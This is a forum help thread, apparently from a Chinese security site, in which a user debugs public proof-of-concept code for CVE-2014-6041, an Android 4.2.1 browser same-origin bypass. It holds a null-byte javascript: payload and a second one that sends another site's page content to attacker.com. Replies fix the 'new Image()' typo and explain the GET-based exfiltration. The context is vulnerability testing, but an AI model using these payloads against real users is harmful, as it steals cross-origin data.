首页
社区
课程
招聘
[求助]CVE-2014-6041漏洞无法完全成功执行
发表于: 2014-10-14 09:38 5523

[求助]CVE-2014-6041漏洞无法完全成功执行

2014-10-14 09:38
5523
CVE-2014-6041漏洞是android4.2.1平台上公布的一个同源策略绕过漏洞

网上公布的测试代码包括两部分,
一是
<iframe name="test"src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">
这部分我在多个浏览器上测试都是能够正常执行的,的确绕过同源检查,弹出alert框

但第二部分,
<iframe name="test"src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=newImage();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')">
没有成功执行,服务器部分应该没错,我把attacker.com改称自己的asp服务器,自己测试都可以,就是在android平台上似乎这段javascript没有成功执行

哪位大神帮忙看看阿

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 43
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
没人关注这个漏洞吗?
2014-10-14 11:25
0
雪    币: 14
活跃值: (73)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
3
newImage
2014-10-14 13:01
0
雪    币: 206
活跃值: (840)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
new Image()中间有空格,//attacker.com  是你的网站(http://……),GET方式接收上传数据(www.rhainfosec.com body)
2014-10-15 10:18
0
雪    币: 43
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
4楼正解!
2014-10-21 16:15
0
游客
登录 | 注册 方可回帖
返回
//